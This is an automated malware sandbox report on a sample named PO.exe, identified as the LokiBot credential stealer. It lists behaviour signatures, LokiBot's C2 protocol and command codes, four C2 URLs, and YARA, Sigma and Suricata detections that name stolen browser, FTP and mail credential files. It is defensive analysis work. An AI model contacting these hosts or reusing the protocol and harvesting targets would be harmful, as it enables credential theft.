Edit tour

Windows Analysis Report
PO.exe

Overview

General Information

Sample name:	PO.exe
Analysis ID:	1623298
MD5:	dc844c53658eb8e174be70d9f7b7e789
SHA1:	b25392616ef8639025855379f28a07e165657e7e
SHA256:	b78e65e95bfd3ead234d18b3f116363c23e993631931f2ce6fe89afdf13ab361
Tags:	exeLokiuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: DC844C53658EB8E174BE70D9F7B7E789)

svchost.exe (PID: 320 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Process Memory Space: PO.exe PID: 6632	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: PO.exe PID: 6632	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: PO.exe PID: 6632	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17a1c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 320	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 320	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 320	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 320	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3732:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO.exe.b90000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO.exe.b90000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO.exe.b90000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO.exe.b90000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.PO.exe.b90000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.PO.exe.b90000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.PO.exe.b90000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.PO.exe.b90000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO.exe.b90000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.PO.exe.b90000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.PO.exe.b90000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.PO.exe.b90000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.PO.exe.b90000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.svchost.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO.exe", CommandLine: "C:\Users\user\Desktop\PO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO.exe", ParentImage: C:\Users\user\Desktop\PO.exe, ParentProcessId: 6632, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO.exe", ProcessId: 320, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PO.exe", CommandLine: "C:\Users\user\Desktop\PO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO.exe", ParentImage: C:\Users\user\Desktop\PO.exe, ParentProcessId: 6632, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO.exe", ProcessId: 320, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:11.820982+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:13.815999+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49705	104.21.96.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:11.100054+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:15.830902+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:17.732481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:21.513553+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:23.406015+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:29.234934+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:31.156773+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:33.109138+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:36.891694+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:48.157567+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:55.751903+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:57.564039+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:59.497837+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:25:01.410148+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:05.320340+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:07.217222+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:09.128533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:12.999939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:14.943218+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:16.841565+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:18.785842+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:20.582160+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:24.422327+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:30.140838+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:32.134031+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:34.079242+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:37.908677+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:39.832786+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:43.709004+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:47.694139+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:49.782796+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:53.663006+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:55.595533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:59.460377+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:01.398189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:03.448370+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:07.176187+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:09.117397+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:13.086717+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50042	104.21.96.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:14.682527+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49706	TCP
